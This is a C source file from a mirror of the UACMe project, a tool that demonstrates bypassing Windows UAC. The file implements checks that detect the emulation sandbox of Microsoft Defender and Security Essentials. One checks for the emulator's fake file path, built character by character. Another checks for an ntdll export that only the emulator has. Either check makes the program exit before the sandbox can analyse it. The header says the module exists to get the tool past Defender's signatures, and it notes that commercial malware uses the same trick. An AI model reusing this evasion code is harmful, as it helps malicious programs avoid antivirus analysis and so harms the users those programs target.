mirror of https://github.com/hfiref0x/UACME.git
120 lines
3.1 KiB
C
120 lines
3.1 KiB
C
/*******************************************************************************
|
|
*
|
|
* (C) COPYRIGHT AUTHORS, 2015 - 2017
|
|
*
|
|
* TITLE: WINDEFEND.C
|
|
*
|
|
* VERSION: 2.72
|
|
*
|
|
* DATE: 25 May 2017
|
|
*
|
|
* MSE / Windows Defender anti-emulation part.
|
|
*
|
|
* Short FAQ:
|
|
*
|
|
* Q: Why this module included in UACMe,
|
|
* I thought this is demonstrator tool not real malware?
|
|
*
|
|
* A: WinDefender is a default AV software installed on every Windows
|
|
* since Windows 8. Because some of the lazy malware authors copy-pasted
|
|
* whole UACMe project in their crappiest malware WinDefender has
|
|
* several signatures to detect UACMe and it components.
|
|
* Example of WinDefend signature: Bampeass. We cannot be prevented by this
|
|
* as this demonstrator must be running on newest Windows OS versions.
|
|
*
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
* PARTICULAR PURPOSE.
|
|
*
|
|
*******************************************************************************/
|
|
#include "global.h"
|
|
|
|
/*
|
|
* wdCheckEmulatedVFS
|
|
*
|
|
* Purpose:
|
|
*
|
|
* Detect Microsoft Security Engine emulation by it own VFS artefact.
|
|
*
|
|
* Microsoft AV provides special emulated environment for scanned application where it
|
|
* fakes general system information, process environment structures/data to make sure
|
|
* API calls are transparent for scanned code. It also use simple Virtual File System
|
|
* allowing this AV track file system changes and if needed continue emulation on new target.
|
|
*
|
|
* This method implemented in commercial malware presumable since 2013.
|
|
*
|
|
*/
|
|
VOID wdCheckEmulatedVFS(
|
|
VOID
|
|
)
|
|
{
|
|
WCHAR szBuffer[MAX_PATH];
|
|
WCHAR szMsEngVFS[12] = { L':', L'\\', L'm', L'y', L'a', L'p', L'p', L'.', L'e', L'x', L'e', 0 };
|
|
|
|
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
|
|
GetModuleFileName(NULL, szBuffer, MAX_PATH);
|
|
if (_strstri(szBuffer, szMsEngVFS) != NULL) {
|
|
ExitProcess((UINT)0);
|
|
}
|
|
}
|
|
|
|
typedef NTSTATUS(NTAPI* pfnNtControlChannel)(
|
|
_In_ ULONG ControlCode,
|
|
_In_ PVOID Data);
|
|
|
|
/*
|
|
* wdCheckEmulatedAPI
|
|
*
|
|
* Purpose:
|
|
*
|
|
* Detect Microsoft Security Engine emulation by it API artefact.
|
|
*
|
|
* This method was revealed by Google Project Zero
|
|
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1260.
|
|
*
|
|
*/
|
|
VOID wdCheckEmulatedAPI(
|
|
VOID
|
|
)
|
|
{
|
|
HMODULE hNtdll;
|
|
pfnNtControlChannel NtControlChannel = NULL;
|
|
|
|
hNtdll = GetModuleHandle(TEXT("ntdll.dll"));
|
|
if (hNtdll) {
|
|
NtControlChannel = (pfnNtControlChannel)GetProcAddress(hNtdll,
|
|
"NtControlChannel");
|
|
|
|
if (NtControlChannel != NULL) {
|
|
ExitProcess((UINT)0);
|
|
}
|
|
}
|
|
else {
|
|
ExitProcess((UINT)-1);
|
|
}
|
|
}
|
|
|
|
/*
|
|
* wdDummyWindowProc
|
|
*
|
|
* Purpose:
|
|
*
|
|
* Part of antiemulation, does nothing, serves as a window for ogl operations.
|
|
*
|
|
*/
|
|
LRESULT CALLBACK wdDummyWindowProc(
|
|
HWND hwnd,
|
|
UINT uMsg,
|
|
WPARAM wParam,
|
|
LPARAM lParam
|
|
)
|
|
{
|
|
switch (uMsg) {
|
|
case WM_CLOSE:
|
|
PostQuitMessage(0);
|
|
break;
|
|
}
|
|
return DefWindowProc(hwnd, uMsg, wParam, lParam);
|
|
}
|